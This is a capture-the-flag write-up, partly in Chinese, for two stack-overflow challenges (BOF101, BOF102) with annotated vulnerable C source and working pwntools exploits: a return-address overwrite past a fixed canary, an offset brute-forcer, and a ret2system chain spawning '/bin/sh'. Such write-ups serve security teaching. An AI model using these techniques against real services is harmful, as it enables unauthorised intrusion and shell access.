
SCTF2021--WP

BOF101

https://blog.restro.cn/wp-content/uploads/2021/08/image-39.png

源文件.c

#include <stdio.h>
//#include <fcntl.h>
//#include <unistd.h>
#include <stdlib.h>
#include <string.h>

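/*
 * Read the contents of /flag and print them to stdout.
 *
 * Reads at most 32 bytes (as before) into a 33-byte buffer so that it can
 * always be NUL-terminated before being handed to printf("%s"); the
 * original read exactly sizeof(buf) bytes and never terminated the string,
 * so %s could read past the end of the buffer. If /flag cannot be opened,
 * the error is reported on stderr and the function returns instead of
 * dereferencing a NULL FILE*.
 */
void printflag(){
	char buf[33];
	size_t n;
	FILE* fp = fopen("/flag", "r");
	if (fp == NULL) {
		perror("fopen /flag");
		return;
	}
	n = fread(buf, 1, sizeof(buf) - 1, fp);	/* n <= 32 */
	fclose(fp);
	buf[n] = '\0';	/* fread() does not terminate; %s requires a terminator */
	printf("%s", buf);
	fflush(stdout);
}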

int main() {
	/* Hand-rolled stack "canary": a compile-time constant placed next to
	 * the overflowable buffer. Because the value is fixed and public rather
	 * than a per-run secret, an overwrite that reproduces 0xdeadbeef passes
	 * the check below (the write-up relies on exactly this). */
	int check=0xdeadbeef;
	char name[140];
	/* Discloses a code address to the client: an information leak that
	 * defeats load-address randomization for this function. */
	printf("printflag()'s addr: %p\n", &printflag);
	printf("What is your name?\n: ");
	fflush(stdout);
	/* Unbounded %s conversion into a 140-byte buffer -- the stack overflow.
	 * A width limit ("%139s") or fgets(name, sizeof name, stdin) would
	 * bound the write. */
	scanf("%s", name);	
	/* Only detects an overwrite that changes the constant; exits instead
	 * of continuing with a corrupted frame. */
	if (check != 0xdeadbeef){
		printf("[Warning!] BOF detected!\n");
		fflush(stdout);
		exit(0);
	}
	return 0;
}

ida

https://blog.restro.cn/wp-content/uploads/2021/08/image-40.png

发现只要使得check的值保持不变,然后把返回地址直接覆盖为printflag的地址就好了

https://blog.restro.cn/wp-content/uploads/2021/08/image-41.png

EXP

from pwn import*
# Connection to the BOF101 service named in the write-up.
p=remote("bof101.sstf.site",1337)
p.recvuntil("What is your name?\n")
# Layout mirrors main() in the source above: 140 bytes fill `name`, the next
# 4 bytes reproduce the constant main() compares `check` against (a fixed,
# public value gives that check nothing secret to protect), then 8 bytes of
# padding (presumably the saved frame pointer) and a hard-coded return
# address. .decode("iso-8859-1") turns each packed value into a str so it can
# be concatenated with the 'a' filler under Python 3; pwntools re-encodes a
# str whose code points are all <= 0xff as ISO-8859-1, so the bytes survive.
payload = 'a'*140 + p32(0xdeadbeef).decode("iso-8859-1") + p64(0).decode("iso-8859-1")  + p64(0x555555555229).decode("iso-8859-1")
p.sendline(payload)
p.interactive()

一开始没有找到附件,,我还以为是个brop,所以写了个offset爆破脚本

爆破脚本

from pwn import *
def get_offset():
    """Probe the BOF101 service with a growing 'a' filler until the service
    reports that its check value was clobbered.

    Written before the challenge source was available (see the note above),
    in Python 2 syntax (print statements), unlike the Python 3 exploit above.

    Returns the filler length at which the service prints
    "[Warning!] BOF detected!", or one less than the current length if the
    connection ends with EOFError first.
    """
    i = 1
    while 1:
        try:
            p=remote("bof101.sstf.site",1337)
            p.recvuntil("What is your name?\n")
            payload = 'a' * i
            print "Now the payload is ",payload
            p.sendline(payload)
            data = p.recvall()
            p.close()
            # The program's own overflow warning (see main() above) is the
            # oracle. From the defender's side, every probe emits this line;
            # logging it server-side would make this kind of scan visible.
            aaa = "[Warning!] BOF detected!"
            if aaa in data:
                return i
            else:
                i+=1

        except EOFError:
            # NOTE(review): if remote() itself raised, `p` is unbound here.
            p.close()
            print "Success,EOFError,Stack is overflow..."
            return i-1
# Run the probe and report the filler length that first trips the check.
size = get_offset()
print "offset is ",size

BOF102

这,,说是栈溢出的加强版,,然后好像就是考的一个栈溢出

https://blog.restro.cn/wp-content/uploads/2021/08/image-42.png

文件源码.c

#include <stdio.h>
#include <stdlib.h>

/* Global buffer filled by bofme()'s first scanf("%16s", ...). A 16-character
 * input plus the terminating NUL is 17 bytes: one past the end of this array. */
char name[16];

/*
 * Challenge routine with two reads into fixed-size buffers.
 *
 * - scanf("%16s", name): the width caps the conversion at 16 characters,
 *   but scanf then appends a NUL, so a 16-character input writes 17 bytes
 *   into the 16-byte global `name` (off by one; "%15s" would fit).
 * - scanf("%s", payload): no width at all, so the 16-byte stack buffer
 *   `payload` can be overrun -- the stack overflow the write-up uses.
 */
void bofme() {
	char payload[16];

	puts("What's your name?");
	printf("Name > ");
	fflush(stdout);
	scanf("%16s", name);	/* up to 16 chars + NUL into name[16] */
	printf("Hello, %s.\n", name);

	puts("Do you wanna build a snowman?");
	printf(" > ");
	fflush(stdout);
	scanf("%s", payload);	/* unbounded write into payload[16] */
	printf("!!!%s!!!\n", payload);
	puts("Good.");
}

/*
 * Entry point: prints a banner via system() and runs bofme().
 *
 * system() is used only for the banner, but calling it here is what links
 * the function into the binary; the write-up notes that system() is present
 * while "/bin/sh" is not. A plain puts() would print the same banner without
 * importing system() at all.
 */
int main() {
	system("echo 'Welcome to BOF 102!'");
	bofme();
	return 0;
}

ida

https://blog.restro.cn/wp-content/uploads/2021/08/image-43.png
https://blog.restro.cn/wp-content/uploads/2021/08/image-44.png

附件中还给了俩32位小程序文件,,但是好像这个题目用不到,,我有点懵,为啥要给,

很明显,给了system但是没给/bin/sh,不过给了一个bss写入点,所以应该是先把字符串写入bss段,然后再去执行。题目只开了nx保护,栈溢出在下面v1处的scanf,所以只要写入,然后返回执行就可以了

https://blog.restro.cn/wp-content/uploads/2021/08/image-45.png

EXP

from pwn import*
# Connection to the BOF102 service named in the write-up.
p=remote("bof102.sstf.site",1337)
p.recvuntil("Name >")
# First read (scanf "%16s") lands in the global `name`, which the write-up
# uses as a writable location at a fixed address in .bss.
p.sendline("/bin/sh")
p.recvuntil(" >")
# Second read (unbounded scanf "%s" into payload[16]) overflows the stack:
# 20 bytes of filler, then three 32-bit values -- presumably system(), a
# dummy return address, and the address of `name`, per the prose above.
payload = 'a'*20 +p32(0x80483E0)+ p32(0)+p32(0x804A034)
p.sendline(payload)
p.interactive()

2021-08-16